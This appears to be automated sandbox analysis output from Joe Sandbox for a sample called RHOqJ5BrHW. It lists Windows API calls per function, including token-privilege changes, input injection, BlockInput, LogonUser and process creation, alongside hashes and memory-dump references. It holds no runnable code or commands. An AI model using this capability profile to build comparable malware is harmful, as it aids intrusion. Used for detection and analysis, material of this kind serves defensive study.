                                    • Instruction ID: 0e34f000f68fc2de87e9f4f442c4ff19ce511cec22bc52e289b0dec536c55e78
                                    • Opcode Fuzzy Hash: 7cfc07b630bac23c8bea979ef15bc4ff107f683f8652deb1d42c5021765b119b
                                    • Instruction Fuzzy Hash: 2D322475A006059FCB28CF69C490E6AB7F4FF49320B11C56EE49ADB3A2E770E941CB44
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,?,?,?,?), ref: 0099B22F
                                      • Part of subcall function 0099B55D: NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 1155049231-0
                                    • Opcode ID: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                    • Instruction ID: 83e1345aacf114a487886dfec89c943ba93cf3e67d80b94439f66c892c9d875b
                                    • Opcode Fuzzy Hash: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                    • Instruction Fuzzy Hash: 10A18870118008BADF38AF6E6E99E7F395EEBEA750B10491EF511D21A5CB2D9C019372
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009D43BF,00000000), ref: 009D4FA6
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009D4FD2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: b069700c064c04a7422764cd7103f90ff2266c01c1da8e9f152c6d969cfbe8bd
                                    • Instruction ID: a862ce0e97cf5b84e3ec3beb9150fc6d3678f85d32d3c4cade5f22c22ae36f18
                                    • Opcode Fuzzy Hash: b069700c064c04a7422764cd7103f90ff2266c01c1da8e9f152c6d969cfbe8bd
                                    • Instruction Fuzzy Hash: A041E771584209BFEB20DF98CD81FBFB7BCEB80754F10842BF205A6290DA719E4197A0
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CE20D
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009CE267
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009CE2B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                    • Instruction ID: 562d317aa0328a7fc19922901a3ec4206cf230488a560ac73c428f144a6d550d
                                    • Opcode Fuzzy Hash: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                    • Instruction Fuzzy Hash: 09213E75A00218EFCB00EFA5D885FADFBB8FF88314F0484A9E945A7351DB319906CB50
                                    APIs
                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                    • GetLastError.KERNEL32 ref: 009BB1BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                    • String ID:
                                    • API String ID: 1922334811-0
                                    • Opcode ID: 3c4f3e6aba6046706e724e2912c59c18dfd040e5d3551e20c8276346710c4914
                                    • Instruction ID: b4daa20dd0ea285046babcf5214c19476b10762d0db0d31c11e3407d9fca9942
                                    • Opcode Fuzzy Hash: 3c4f3e6aba6046706e724e2912c59c18dfd040e5d3551e20c8276346710c4914
                                    • Instruction Fuzzy Hash: 4B118FB2504205AFE718DF98DD95E6BB7ADEB44720B20852EF45A97250DBB0FC428B60
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66AF
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009C66EC
                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009C66F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                    • Instruction ID: 10988c69fccdbdf52e9ff978f438bf1f53ba66e9a20b32fb2f00751c26c745fd
                                    • Opcode Fuzzy Hash: 73f0ab4761488ca81b1adb4ef4754f9bc6447d443c6662f1cee5d5a0ad007e73
                                    • Instruction Fuzzy Hash: C311A5B2D00228BEE710CBE8DC45FAFBBBCEB09714F004655F901E7190C2749E0587A2
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 009C7223
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009C723A
                                    • FreeSid.ADVAPI32(?), ref: 009C724A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                    • Instruction ID: 17a3399db2023cb72cb470e5c0df09b5d707c40b216617aa73d45f65f459b995
                                    • Opcode Fuzzy Hash: 06741cde133c1092169eb43fc117ecbc5d491403d963a39219f5abf45e0dc572
                                    • Instruction Fuzzy Hash: CAF01D76A0420DBFDF04DFE4DD89EEEBBBCEF08301F104469A606E2191E2709A458B10
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 009EF6AC
                                    • 6F58C5D0.COMCTL32(?,?,?,009FE52B,?,?,?,?,?), ref: 009EF6B8
                                    • NtdllDialogWndProc_W.USER32(?,00000200,?,?,?,?,?,?,?,009FE52B,?,?,?,?,?), ref: 009EF6D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 8bad4b59f1de18569884ea6dd54c920d84e943423f309ac79c9eb379b678fe21
                                    • Instruction ID: a05c18a742badb532acc99a9c459c062ead2be1184024f4216e31f77fc8fa510
                                    • Opcode Fuzzy Hash: 8bad4b59f1de18569884ea6dd54c920d84e943423f309ac79c9eb379b678fe21
                                    • Instruction Fuzzy Hash: A2F01276400218FFEB05CFC5DC09AAEBBB8EF44311F14405AF906A2160D7B1AA52ABA0
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • GetParent.USER32(?), ref: 009FE5B2
                                    • NtdllDialogWndProc_W.USER32(?,00000133,?,?,?,?,?,?,?,?,0099B1E8,?,?,?,00000006,?), ref: 009FE62C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogNtdllParentProc_
                                    • String ID:
                                    • API String ID: 314495775-0
                                    • Opcode ID: 72751cb4fb77328f17619d988e4bddcc7148229976ce60d452e5f964e9d3d14d
                                    • Instruction ID: cc20c52ee6c8144dd8b5150ed3458dd8b51a48a1c58592797ef11d9732f0b9ec
                                    • Opcode Fuzzy Hash: 72751cb4fb77328f17619d988e4bddcc7148229976ce60d452e5f964e9d3d14d
                                    • Instruction Fuzzy Hash: B321A538601108AFDF20DB6CAD859B9779AAB4A324F184256F6194B2F1D7389D42D700
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CF599
                                    • FindClose.KERNEL32(00000000), ref: 009CF5C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                    • Instruction ID: 39a39b77b87b2eee3a9d5e9cc98696fa3d7093c5fc9b3f6b0a501b577da95f70
                                    • Opcode Fuzzy Hash: 3f734a59fdf6d7ea300bfb5a7fbf795e3bf698bd4ededb3c7d2df255de4c55a1
                                    • Instruction Fuzzy Hash: A21161726006049FDB10EF69D845B2EB7E9FF88324F04895EF9A9D7291DB34E9018B91
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,0000002B,?,?,?,?,?,?,?,009FE44F,?,?,?), ref: 009EF344
                                      • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009EF32A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 30f35c21b7c1701be321904c24439d37d5c0be6ef289aa93c7f0e53df75b89f0
                                    • Instruction ID: 3d84c67a3249a1e4d8e30b3ae82830c4375125af293113611a8547ee22e753ce
                                    • Opcode Fuzzy Hash: 30f35c21b7c1701be321904c24439d37d5c0be6ef289aa93c7f0e53df75b89f0
                                    • Instruction Fuzzy Hash: 5101F135201214ABCF22DF55DC94F6A7B6AFBC5360F180525F8150B2E0C732AC43DB50
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEA7
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009DBE6A,?,?,00000000,?), ref: 009CCEB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                    • Instruction ID: 6128f325551f887e417f8e91178e90a066efd6395ee82e73e8de19d6042cb30a
                                    • Opcode Fuzzy Hash: 3816181c7f93ef39e752d7ffc470ea5ec7336136c25b2c34ac1ffc0ee56b7a60
                                    • Instruction Fuzzy Hash: 2FF0827550022DABDB10ABE4DC49FEA776DFF09351F004169F919D6181D7309A41CBA5
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 009C4153
                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 009C4166
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                    • Instruction ID: bd5d59ba95451e2493fe37810423b8edbf84839f841a73908dbdb7ee14500821
                                    • Opcode Fuzzy Hash: 294f6b0b76eab17a7069e332349e6b8319321db0a0a31e4616e6e75486383bd7
                                    • Instruction Fuzzy Hash: E1F0677190424DAFDB058FA0CC05BBE7FB4EF10309F04840AF966AA192D77996129FA0
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                    • CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: e85759df309871ec4c5cd4ce25d60507728af92408440cabaf0c609e7d518519
                                    • Instruction ID: 4dc31a2574cec4d192baa412e2df7f9ae476ff52240420d5d58602a394dd0f56
                                    • Opcode Fuzzy Hash: e85759df309871ec4c5cd4ce25d60507728af92408440cabaf0c609e7d518519
                                    • Instruction Fuzzy Hash: EEE0E672000510AFEB252F94EC05D77BBEDEF44320711C529F45AC1470DB625D91DB51
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EF7CB
                                    • NtdllDialogWndProc_W.USER32(?,00000084,00000000,?,?,009FE4AA,?,?,?,?), ref: 009EF7F5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 2d43f2b725db144dd3b2244c9637c3c7d769e11dfb742e9ecc8fe50389642a91
                                    • Instruction ID: d120c6af38db7f44031c96caaf2952b42a35161ae3c5250f5eb58dba8607fe17
                                    • Opcode Fuzzy Hash: 2d43f2b725db144dd3b2244c9637c3c7d769e11dfb742e9ecc8fe50389642a91
                                    • Instruction Fuzzy Hash: 53E0C231104258BBEB154F4ADC1AFBA3F18EB00B50F108526FD5B984E0E7B29892D260
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,009A6DB3,-0000031A,?,?,00000001), ref: 009A81B1
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A81BA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                    • Instruction ID: 5cb72126c17b0e93250f1ef2b8c15e89fb4d443515664cbb36fe9960e2bbfedc
                                    • Opcode Fuzzy Hash: 8dbbe420953de12883ebe6b345424359c36ca585bf9236879b93545bfd197906
                                    • Instruction Fuzzy Hash: 5BB0923204460CABDB006BE1EC09B587F68EB08752F004010F60D480618B7254138A93
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID: @
                                    • API String ID: 3728558374-2766056989
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    APIs
                                    • __time64.LIBCMT ref: 009CB6DF
                                      • Part of subcall function 009A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBDC3,00000000,?,?,?,?,009CBF70,00000000,?), ref: 009A3453
                                      • Part of subcall function 009A344A: __aulldiv.LIBCMT ref: 009A3473
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    Similarity
                                    • API ID: Window$CallLongProc
                                    • String ID:
                                    • API String ID: 4084987330-0
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    APIs
                                    • NtdllDialogWndProc_W.USER32(?,00000053,?,?,?,009FE4D1,?,?,?,?,?,?), ref: 009EF67F
                                      • Part of subcall function 009EE32E: _memset.LIBCMT ref: 009EE33D
                                      • Part of subcall function 009EE32E: _memset.LIBCMT ref: 009EE34C
                                      • Part of subcall function 009EE32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                      • Part of subcall function 009EE32E: CloseHandle.KERNEL32 ref: 009EE38D
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    APIs
                                    • NtdllDialogWndProc_W.USER32 ref: 009EF5D0
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    APIs
                                    • NtdllDialogWndProc_W.USER32 ref: 009EF5FF
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099B72B), ref: 0099B7F6
                                      • Part of subcall function 0099B73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0099B72B,00000000,?,?,0099B2EF,?,?), ref: 0099B88D
                                    • NtdllDialogWndProc_W.USER32(?,00000002,00000000,00000000,00000000,?,?,0099B2EF,?,?), ref: 0099B734
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009A818F
